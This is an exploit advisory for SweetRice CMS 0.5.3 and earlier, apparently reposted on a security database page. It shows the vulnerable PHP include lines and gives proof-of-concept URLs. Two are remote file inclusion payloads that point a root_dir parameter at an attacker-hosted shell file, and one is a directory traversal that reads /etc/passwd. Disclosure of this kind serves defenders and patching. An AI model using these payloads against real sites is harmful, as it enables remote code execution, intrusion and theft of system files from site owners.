SweetRice <= 0.5.3 Multiple Remote Vulnerability

2009-12-08 / 2009-12-09
Credit: cr4wl3r
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2009-4224 | CVE-2009-4231
CWE: CWE-20

[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ] ######################################################################## #SweetRice <= 0.5.3 Multiple Remote Vulnerability #Download Script : http://www.basic-cms.org/ #Dork : die("lamers attempt"); :P ######################################################################## # #RFI Vuln : ./sweetrice/_plugin/subscriber/inc/post.php (line 2) # <?php # include_once($root_dir."_plugin/fckeditor/fckeditor.php") ; # ?> #PoC : http://[target]/[path]/_plugin/subscriber/inc/post.php?root_dir=http://[attacker]/shell.txt??? # #RFI Vuln : ./sweetrice/as/lib/news_modify.php (line 2) # <?php # include_once($root_dir."_plugin/fckeditor/fckeditor.php") ; # ?> #PoC : http://[target]/[path]/as/lib/news_modify.php?root_dir=http://[attacker]/shell.txt??? # ######################################################################## #LFI Vuln : ./sweetrice/as/lib/plugins.php # <?php # if(file_exists('../_plugin/'.$plugin.'/plugin_config.php')) # { # include('../_plugin/'.$plugin.'/plugin_config.php'); # ?> #PoC : http://[target]/[path]/as/lib/plugins.php?plugin=../../../../../../etc/passwd # ######################################################################## ######################################################################## ####################[90r0nt4l0 und3r9r0nd c0mmun1ty]#################### ######################################################################## ######################################################################## [ Gorontalo / 2009 ]

References:

http://packetstormsecurity.org/0911-exploits/sweetrice-rfilfi.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top